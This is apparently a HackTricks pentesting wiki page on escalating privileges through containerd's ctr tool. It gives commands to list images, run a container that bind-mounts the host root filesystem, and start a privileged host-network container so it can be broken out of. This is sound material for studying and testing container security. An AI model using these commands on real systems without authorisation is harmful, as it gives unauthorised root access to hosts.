hacktricks/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md

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# Containerd \(ctr\) Privilege Escalation
## Basic information
Go to the following link to learn **what is containerd** and `ctr`:
{% page-ref page="../../pentesting/2375-pentesting-docker.md" %}
## PE 1
if you find that a host contains the `ctr` command:
```bash
which ctr
/usr/bin/ctr
```
You can list the images:
```bash
ctr image list
REF TYPE DIGEST SIZE PLATFORMS LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
```
And then **run one of those images mounting the host root folder to it**:
```bash
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
## PE 2
Run a container privileged and escape from it.
You can run a privileged container as:
```bash
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
```
Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**:
{% page-ref page="docker-breakout.md" %}